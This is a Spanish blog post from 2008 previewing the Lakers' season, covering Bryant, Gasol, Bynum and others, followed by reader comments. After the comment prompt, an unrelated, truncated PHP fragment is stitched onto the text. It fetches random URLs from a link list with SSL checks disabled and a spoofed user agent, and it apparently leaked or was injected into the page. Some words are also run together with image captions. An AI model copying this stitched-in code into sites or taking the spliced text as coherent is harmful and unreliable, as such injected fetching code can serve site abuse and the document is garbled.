L.A. Lakers: La llamada del deber

26 de October de 2008 por MagicJohnson32

lakersfive

Tras analizar a los 28 equipos que no fueron protagonistas de las pasadas Finales, encaramos los dos días previos al arranque de la temporada con Lakers (hoy) y Celtics (mañana).

L.A. Lakers: La llamada del deber
Para empezar, tiremos de lógica facilona: Si a la plantilla con la que los Lakers se pasearon en los Playoffs del Oeste (firmaron un balance de 12-3) y con la que cayeron 4-2 ante los Celtics en las Finales le sumamos unos sanos Bynum y Ariza, y quién sabe si Mihm, el resultado es un equipo campeón. Así han debido pensar los responsables de la franquicia angelina, que se han mostrado extremadamente conservadores en el mercado de verano, y así opinan la mayoría de analistas y los GM’s de la liga.

Pero demos por cerrado, inmediatamente, el capítulo de hipótesis y especulaciones. Propongámonos olvidar lo ocurrido la pasada temporada, que de poco o nada servirá en ésta. Empecemos de cero. Y analicemos la plantilla de los Lakers, pieza por pieza.

mvpObviamente, el engranaje funciona en torno a Kobe Bryant. El dueño del dedo meñique más famoso del deporte planetario es el líder absoluto de los Lakers, y su jerarquía se ha visto reforzada, no sólo en su equipo sino en toda la liga, con su primer galardón como jugador más valioso de la regular season y su participación en los Juegos Olímpicos. No  da la impresión de que su larguísima pasada temporada (Torneo de las Américas, más los 82 partidos de regular season, más 21 de Playoffs, más los 8 de los Juegos Olímpicos) le vaya a pasar factura, y debería de ofrecer el gran rendimiento al que nos viene acostumbrando. Su decisión de no operarse el dedo, que en su día ya ponderamos debidamente, añade un punto de suspense a un amplio listado de certezas: Bryant volverá a brillar, volverá a estar entre los máximos anotadores de la liga y volverá a ser uno de los candidatos al MVP. Pocas razones, o más bien ninguna, hay para prever otra cosa. No tan fácil de prever será la decisión que Kobe tomará a la conclusión de la temporada: podría, por supuesto, agotar los 2 años (y cerca de 48 millones de dólares) que le restan de contrato; pero también cuenta con la posibilidad de renunciar a ellos y convertirse en agente libre sin restricciones; entonces, los Lakers podrían ofrecerle un nuevo contrato de 5 años y alrededor de 135 millones, más que cualquier otra franquicia. La tercera vía: que juegue la próxima campaña con su actual contrato y renuncie al último lopauaño. Dada la actual situación todo parece indicar que, en cualquiera de los tres casos, Bryant y los Lakers ampliarán su vinculación tanto como el convenio permita (4 ó 5 años, según la opción que tome).

El principal escudero de Bryant, tanto por estadísticas como por ascendencia en el juego y en los resultados del equipo, ha de ser Pau Gasol. Tras un año en el que ha coleccionado subcampeonatos (en orden cronológico:  Eurobasket, NBA y Juegos), Gasol encara una temporada decisiva en la que se le exigirá más aún de lo que ya ofreció, que no fue poco. Su bajo rendimiento en las Finales reflotó el debate sobre su posición natural y la conveniencia de que Gasol juegue al lado de un pívot puro. Ese pívot, que ha de aportar los kilos y capacidad de intimidación de los que carece Gasol, es Andrew Bynum.

O al menos, eso es lo que de él se espera.  Bynum -que mañana, 27 de octubre y víspera del arranque de la temporada 08-09, cumplirá 21 años- estaba promediando más de 13 puntos, 10 rebotes y 2 tapones en menos de 29 minutos hasta que el 13 de enero se lesionó la rodilla izquierda. Entonces, el #17 se convirtió en el Godot particular de los Lakers en la segunda mitad de temporada: se le esperó con ansia durante meses pero jamás llegó. El jugador de Nueva Jersey ha asegurado a través de su página oficial que está completamente recuperado, aunque en pretemporada hemos podido comprobar que aún necesita minutos hasta alcanzar la mejor forma. Para demostrar que merece la ampliación de contrato por el máximo de 80 millones de drewdólares, 17 por temporada, ha de ser capaz también de soportar la presión que sobre él han colocado el exigente público de L.A. y la prensa en general. La franquicia, por el momento, se muestra reticente a hipotecarse sin tener más pruebas de que Bynum está completamente recuperado, y parece que baraja una cifra que ronda los 10 millones por año. Si no se produce un acuerdo antes del 31 de octubre, el jugador se convertirá en agente libre restringido a la conclusión de la temporada, con lo que Lakers podrán igualar la mejor oferta que reciba Bynum, quien también podría ampliar por un año y 3.8 millones para convertirse en agente libre sin restricciones en el verano de 2010. Del rendimiento de Bynum y su adaptación junto a Gasol, que jugará más alejado del aro y se encontrará en muchas más ocasiones con superioridad física sobre su par, dependerán buena parte de las posibilidades de los Lakers.

También esencial será el papel de Lamar Odom, cuyo nombre ha seguido y seguirá siendo objeto de rumores de traspaso especialmente ahora que es expiring, y del que no descartamos que sea intercambiado por un alero más al uso. A lo largo del verano ha ganado fuerza la posibilidad de su desplazamiento a la función de sexto hombre, y tiene sentido: Odom encaja en el perfil y daría a Jackson una gran flexibilidad en las rotaciones. El polivalente jugador neoyorquino, que se convertiría en gran candidato al galardón de Mejor 6º Hombre, saldría en una u otra posición en función de las necesidades del equipo mientras que de inicio jugaría alguno de tres aleros puros con los que cuentan los Lakers, Radmanovic, Ariza y Walton. Una opción bastante probable es la de Trevor Ariza, un jugador joven, muy atlético, intenso y agresivo que encaja en lo que Jackson busca en un SF. El ténico, sin embargo, ha asegurado que Radmanovic mantiene la plaza como titular, y que no planea cambiar mientras los resultados y el juego sean buenos. En cualquier caso, entre los tres aleros se repartirán las titularidades, si finalmente Jackson se decide a emplear a Odom como sexto hombre.

Las responsabilidades desde la posición de base, a priori la más débil del equipo, seguirán siendo para Derek Fisher y Jordan Farmar. Ambos cumplieron durante el grueso de la temporada pasada pero no estuvieron al nivel adecuado en los Playoffs: Fisher porque llegó con problemas físicos (a finales de marzo se lesionó un tendón del pie derecho en un partido ante los Warriors y decidió no operarse debido a la cercanía de los Playoffs) y Farmar porque se diluyó tras un ilusionante inicio de campaña. No le quedará a Phil Jackson sashavujacicmás remedio que confiar en la solidez de uno y la previsible evolución del otro (algo de lo que Farmar ya ha dado muestras en los partidos de exhibición), puesto que cualquier otra opción de las que ofrece la plantilla no pasaría de ser un parche. Pero de entre todos los parches posibles, hay uno que dio buenos resultados, que Phil Jackson empleó con frecuencia y que el Maestro Zen podrá volver a utilizar tras la renovación de Sasha Vujacic. El esloveno,  con ciertos problemas físicos en las últimas semanas por una fractura en el tobillo, se ha ganado un contrato por 3 años y 15 millones de dólares además de la fama de ser uno de los mejores triplistas de la liga y un jugador con personalidad y decisión en el clutch. Ahí, en su infinita confianza en sí mismo y en su tiro, reside el secreto del éxito de Vujacic, que partirá desde el banquillo pero será uno de los habituales en los minutos decisivos, bien como falso base o bien desplazando a Bryant a la posición de alero.

Al margen de la renovación de Vujacic, y la posterior de DJ Mbenga, poco movimiento ha habido en la plantilla de los Lakers durante el verano. Se marchó el entusiasta Ronny Turiaf a Oackland tras recibir una oferta que los angelinos no estaban dispuestos a igualar, y en su lugar llegó Josh Powell, ala-pívot de una notable envergadura, hábil para el rebote ofensivo y que viene de firmar en los Clippers su mejor campaña en la NBA. Powell no tiene difícil mejorar el rendimiento de Turiaf, aunque es probable que baile menos y no protagonice tantos vídeos de youtube como el francés.

La exigua lista de novedades se cierra con Sun Yue, jugador seleccionado en la segunda ronda del draft de 2007 y que ya tiene su contrato garantizado para las próximas dos campañas. Sun, al que hemos podido ver con la selección china, no pasa de proyecto bastante incipiente de jugador, aunque su polivalencia le puede facilitar el disponer de algunas oportunidades en cualquiera de las posiciones exteriores. Quedará únicamente por saber si Chris Mihm sigue siendo un jugador en activo tras dos años sin apenas jugar (el jugador asegura que está en perfecto estado de forma por primera lakersteamfinalsvez en mucho tiempo, en cuyo caso supondría una rotación más que interesante para el juego interior laker) y si Coby Karl se gana un contrato garantizado y una plaza en la plantilla 08-09.

Lo indudable es que los Lakers parten entre los principales candidatos al título, tal vez como los grandes favoritos. Tras su casi improvisado asalto al Anillo en una temporada que nació repleta de dudas y se cerró con el sabor amargo de la derrota ante Boston, el equipo afronta una campaña en la que no debería de haber cambios especialmente traumáticos en la plantilla. Nadie esconde en los Lakers que la situación es idónea, que han pasado a encabezar el nuevo orden del Oeste (con Hornets y Blazers a rebufo) y que las expectativas son las más altas. Y eso, en una franquicia acostumbrada a los baños en confetti, implica que ganar es un deber.

Quinteto inicial: Derek Fisher, Kobe Bryant, V. Radmanovic / T. Ariza, Pau Gasol y Andrew Bynum.

Sexto Hombre: Lamar Odom.

Pronóstico: Campeones.

Comenta

20 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Cuando tienes razón, la tienes. Además de resultados, espero pasarmelo muy muy bien con este equipo.

    Por discrepar en algo, creo que Odom acabará siendo titular, pero como que me da igual que lo sea o no, no influirá en el rendimiento global.

      Citar

  2. Jabho dice:
    #2

    A mi me parece la mejor plantilla de la liga. Creo que son un equipazo en todos los aspectos, lamentablemente 🙂 No tanto por quinteto, que los hay mas o menos igual de buenos, como por alternativas en el banco.

    Por poner peros diría que deben corregir la falta de agresividad y la poca “dureza mental” que demostraron en la final. Cuando lleguen momentos difíciles les pueden volver viejos fantasmas.Incorporar un Zo o un PJ sería casi decisivo.

    Además de Ariza ojito a Farmar y Vujacic. Los tres están van a hacer un gran año.

      Citar

  3. Hynreck dice:
    #3

    Buf que aburrimiento, un artículo de los Lakers firmado por Magic, paso de leerlo…que pereza por Dios… 😛

    Na en serio, seguro que son el equipo a batir y primer favorito por encima de Celtics, todo lo que no fuese el anillo sería una decepción, aun así no se por qué, me da mucho mucho miedo Cleveland.

      Citar

  4. MagicJohnson32 dice:
    #4

    Cada vez estoy más convencido de que Phil saldrá con Fisher, Kobe, Radman, Gasol y Bynum. Y acabará el primer cuarto con Farmar, Kobe, Ariza, Odom y Pau. Sasha dará unos minutos de descanso a Kobe, y luego cuando Bryant vuelva, Vujacic será o falso base o incluso falso 3. La cosa es que Phil contará con muchas posibilidades y podrá ajustar la rotación al estado de forma de los jugadores y al juego del rival.

    Sobre lo que comenta Jabho, también creo que Farmar y Ariza lo harán muy bien. Ya en preseason se les ha visto pletóricos. A Sasha no creo que se le pueda pedir mucho más que repetir lo del año pasado, que no fue poco.

      Citar

  5. Kantonyo dice:
    #5

    Todo lo que no sea quedar primeros de la división, primeros de la liga regular del Oeste, campeones de la conferencia Oeste, y campeones de la NBA, será un fracaso, para el mejor equipo sin duda de la liga

    Sobre todo tengo interes por el rendimiento que pueda ofrecer Trevor Ariza, creo que puede ser un jugador importante, y creo que si Phil Jackson confia en él, como parece que lo va a hacer, se puede convertir en un jugador importante desde el banquillo e incluso en el equipo títular.

    Con respecto a Pau Gasol, parece que ha hecho unas declaraciones en las que comenta que empieza la temporada cansado tanto mental como fisicamente despues del año anterior. Veremos como empieza, ya que es la primera vez en la NBA que no tiene la titularidad garantizada.

    La nota negativa en esta franquicia, es la debil personalidad que reflejó en la final contra Boston, en la cual a mi entender tenía la plantilla y la calidad necesaria para haber sido campeones.

    Estoy deseando ver el primer partido de la temporada, PARTIDAZO!! Lakers-Blazers ….. q mono de NBA!!

      Citar

  6. TheDeerHunter dice:
    #6

    Yo creo que os confundís cuando habláis de la supuesta fragilidad mental de la final contra boston. Claramente se trataba de fragilidad física, con un único pívot de verdad (y ni eso) pegándose por este orden contra Camby&Martin, Boozer&Okur, Duncan y Garnett, ahí es nada y todo un elenco de blanquitos talentosos (excepto un blanquito)
    La expresión de Gasol con esa delgadez y esa barva, como en la final del europeo, por momentos parecía casi de martirio nazareno. Esa imagen lo resumía todo. Hasta a Kobe, con lo duro que es, se le notó falto de gasolina en la final… al menos comparado con Boston que demostraron ser roca pura. Y, sin contar los lesionados incluyendo aquí a Mihm y Ariza, varios jugadores más físicamente tocados. Aún así hubo momentos en los que hubo opciones de ganar, se diga lo que se diga.
    Otra cosa es que jugar de visitante en el Boston Garden es un reto psicológico digno de campeones.

    Ese aspecto físico, el del equipo de los 5 blanquitos, mejora mucho con Bynum y Ariza, que son dos auténticas bestias pardas. Por contra Boston lo pierde en parte…

    Analizando más atentamente el equipo, espero un descenso de minutos de Kobe, Fisher y Gasol en la regular y un aumento significativo de prestaciones de Ariza, Farmar, Vujacic… es cierto que bastante hizo el año pasado pero éste jugará más minutos, incluidos los que pueda jugar de base.
    Yo no esperaría mucho “torres gemelas”. Creo que Gasol ha dejado de ser el 4 que todos recordamos y se implementará un rollo Marc&Gasol de la selección. Es decir, puntualmente coincidirá con Bynum (fundamentalmente en los primeros minutos de titular) y después se dedicarán a alternarse. Esto no es necesariamente negativo para Gasol.
    Creo que Bynum será definitivamente la 2ª espada. Es un jugador magnífico. El ideal de lo que debe de ser un center. Gigantesco, pero no pesado. Ágil e incluso con buena mano. Es un animal y viene hambriento, por lo que bien harán Phil Jackson y Gasol en suministrarle comida.
    Gasol es lo suficientemente inteligente como para dar al equipo lo que necesite y con Bynum sano no le necesitan como Pívot dominante. Tampoco necesita serlo ya. Ya ha demostrado todo lo que es en la liga y disfruta de prestigio y contrato de estrella. Lo único que le queda es ganar un anillo y él lo sabe y lo ansía.
    Con Odom son los pegamentos perfectos y creo que combinarlos en segunda oleada será demoledor.
    Tenía dudas con Farmar, pero esta temporada parece que viene con la mala leche que nos hace falta. Fisher cumplirá y puede que Vujacic les ayude. El paso adelante que dieran él y Ariza podría significar un anillo de sobrados.
    Por lo demás, el equipo está fantásticamente bien armado. Se ha echado en falta pulir algún último detalle que queda pero las alternativas tácticas que hay son verdaderamente acojonantes.
    No obstante, ganar un anillo no se puede garantizar ni con el dream team reencarnado (bueno, con ellos quizás sí) Y la competencia es más brutal que nunca… empezando por los actuales campeones.

    A por la gloria. Ahora o nunca.
    Creo que lo vamos a pasar bien.

      Citar

  7. MagicJohnson32 dice:
    #7

    No estoy de acuerdo en lo de Pau & Bynum. Yo creo que van a coincidir bastante, pese a que Phil seguro que hará para que siempre esté uno de los dos en pista, y van a hacer una gran conexión. Pau es un excelente pasador y juega muy bien desde el poste medio; Bynum es un finalizador tremendo, aprovecha muy bien los espacios y resulta fácil lanzarle alley-oops. Estoy convencido de que esta sociedad dará mucho de sí. De momento, en pretemporada se ha visto cómo han ido mejorando su juego partido a partido. Pau ha jugado poco pero se le ha visto bien como PF (hace un par de días el LA Times publicaba un artículo en el que destacaba que, discretamente, entre los debates sobre el papel de Odom, el contrato de Bynum y el meñique de Kobe, Gasol ha demostrado que puede volver a jugar de 4 y en pocos minutos ha hecho unos números impecables).

    Ah, y eso de que Kobe jugará menos minutos creo que lo leo cada pretemporada, jeje. Me lo creeré cuando lo vea.

    Eso sí, estoy de acuerdo contigo en lo de la debilidad mental. Lakers llegó a la final con las ideas muy claras pero con escasez de físico y de alternativas, algo que Bynum, Ariza y puede que Mihm aportarán de sobra.

    ¡Y sobre todo estoy de acuerdo en que vamos a disfrutar mucho!

    That’s entertainment, pará-pa-paraparará…

      Citar

  8. Jabho dice:
    #8

    A mi lo del cansancio del año pasado me suena a milonga. Pau y Kobe si van a llegar fundidos este año.

    Creo que a Lakers le falta algo de carácter en la zona y algo de veteranía en general. A ver Bynum que aporta por dentro y si Fisher no se lesiona.

    Pero vamos, que el enemigo a batir son los Lakers. Es el mejor equipo y en circunstancias normales si no gana…. (ojala veamos una desintegración similar a la de Dallas 😉 )

      Citar

  9. TheDeerHunter dice:
    #9

    Pues si fue milonga será que fue casualidad que Boston se hiciera superior siempre en las segundas partes y conforme fuera avanzando el partido.
    Quizás me estoy inventando que la preparación física de Gasol estaba diseñada para terminar la temporada en marzo, o que él era el único pívot disponible sin contar con Turiaf ni Mihm (que no contaron). Será fantasía mía que Kobe y algún otro tenían problemas físicos causados por el desgaste o que son lo mismo físicamente los Posey, Powe, PJ Brown, House, T. Allen contra los Radmanovic, Vujacic, Farmar o Walton…
    Será que tal fue la “comida de moral” que nos dió Boston que en todos los contraataques había el doble de jugadores verdes que amarillos…

    En fin, está claro que la temporada será exigente para los olímpicos… pero este año el equipo está mucho mejor preparado a priori para rotar lo que haga falta y proteger físicamente a los jugadores clave. Amén que el nivel físico de Lakers ha subido extraordinariamente.
    Cuando hablaba de la bajada de minutos de Bryant no lo decía porque él no sea capaz de jugarlos si el equipo lo necesita. Lo decía porque sería lo más inteligente no fundir físicamente a Kobe y a algunos otros en temporada regular dado el equipo ya no depende tan exclusivamente de él.

    PD: Apostaría más por una desintegración en Boston que en L.A. fíjate lo que te digo. Además que no comparto que Dallas están definitivamente desintegrados.

      Citar

  10. MagicJohnson32 dice:
    #10

    Ah, yo no digo que los Lakers llegasen fundidos, aunque a Kobe sí se le vio cansado. Pero no me refiero a eso. Digo que eran claramente inferiores físicamente, sin un C grande y fuerte y sin su único SF atlético.

      Citar

  11. Gallis dice:
    #11

    Vamoooooooooooosssssssssssssss!!!!!!!!!!!!!!!!!!

      Citar

  12. Jabho dice:
    #12

    Justito Ariza y Bynum ¿no?

    Son bajas importantes, pero mas allá de las bajas hubo otros factores. Vamos, que Posey y Powe parecián All Stars

    Sobre desintegración pues puede pasarle a Boston. Pero este proyecto ya ha ganado un anillo….

      Citar

  13. Elio dice:
    #13

    Yo creo que este año son los máximos aspirantes y que no dejarán pasar la oportunidad de colocarse el anillo. Toda la NBA teme a los Lakers, será por algo.

      Citar

  14. llukas70 dice:
    #14

    Los Lakers son el mejor equipo del momento y estan por encima de todos. Kobe Bryant ya a ganado el MVP y ahora solo le falta ganar el mejor titulo del mundo siendo el la gran estrella. Aunque yo me ago una pregunta y es por que Kobe con los numeros que tiene y los titulos que ha ganado colectivamente y individualmente no es reconocido una superestrella a la altura de Jordan o Magic. La respuesta es que Jordan o Magic a diferencia de Bryant, han ganado titulos de la NBA siendo ellos la gran estrella y Kobe en cambio lo tuvo que hacer estando en un segundo plano en el que Shaq era la gran estrella. Otra respuesta es que cuando Bryant ha sido el lider en solitario de los Lakers no ha conseguido llevarlos en lo mas alto, y no a sido ahora hasta la llegada de Gasol que estuvieron apunto de ganar el anillo. La cuestion es que si Bryant gana el anillo siendo el la estrella numero uno llegara a ser reconocido uno de los mejores jugadores de toda la epoca que creo que es lo que se merece. Y tambien lo mas esperado es si los Lakers ganaran este año el anillo. Por que lo haran, no?¿

      Citar

  15. Viva_Dirk dice:
    #15

    Discrepo bastante en lo de Kobe, es prontísimo para hablar de que lugar merece en la historia.

      Citar

  16. llukas70 dice:
    #16

    Te dire una cosa VIVA_DIRK , no se si lo sabes pero Kobe Bryant ya tiene 30 años ( que sepas que no es aquel jovencito que gano 3 anillos de la NBA consecutivos), y es verdad que es el jugador que mas marca el presente de la NBA, pero no el futuro. El futuro es cosa de jugadores como Chris Paul, Lebron James o Dwight Howard. A Kobe Bryant le quedan pocos años de noches en que anota mas de 30 puntos por partido, en que juega 82 partidos por temporada mas los de playoffs… Por esa razon yo creo que ya se tiene que empezar a hablar del lugar que Bryant merece en la historia. No crees?¿ Por que a Kobe de futuro le queda mas bien poco.

      Citar

  17. MagicJohnson32 dice:
    #17

    A Kobe le quedan unos 5 años al máximo nivel. No creo que haya otro jugador con una mejor prepración física, y dudo que su rendimiento se resienta hasta dentro de varios años.

    Por eso, dejemos que acabe su carrera porque hasta entonces no podremos verla con la perspectiva adecuada.

      Citar

  18. Viva_Dirk dice:
    #18

    Si Lucas, conozco la edad de Bryant, también conozco sus méritos y sus deméritos, si la carrera de Kobe acabase hoy creo quedaría muy lejos de esos que nombras, por eso digo que dejemos que acabe su carrera y entonces veremos.

    Pero por si acaso, te adelanto que en mi opinión Kobe dispone ahora mismo del mejor juego interior de la liga, Gasol-Bynum y Odom de reserva es un escandalo, y como no complete al menos ‘una manita’ de anillos antes de retirarse sera muy dificil que este a ese nivel.

      Citar

  19. MagicJohnson32 dice:
    #19

    Hombre, Jerry West ganó un anillo, y es uno de los grandísimos sin discusión. Wilt ganó 2, y ahí está. No sé, es discutible. Pero vamos, que como digo queda muuuucho hasta que la carrera de Bryant se acabe.

      Citar

  20. Viva_Dirk dice:
    #20

    ¿Y cuantas finales disputaron?¿Contra quien perdieron? A mi la derrota de Bryant el año pasado en las finales me parece aceptable, pese a su mala actuación en la final, pero con el equipo que tiene ahora mismo, sin lesiones, no habría excusa para algo que no sea ganar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>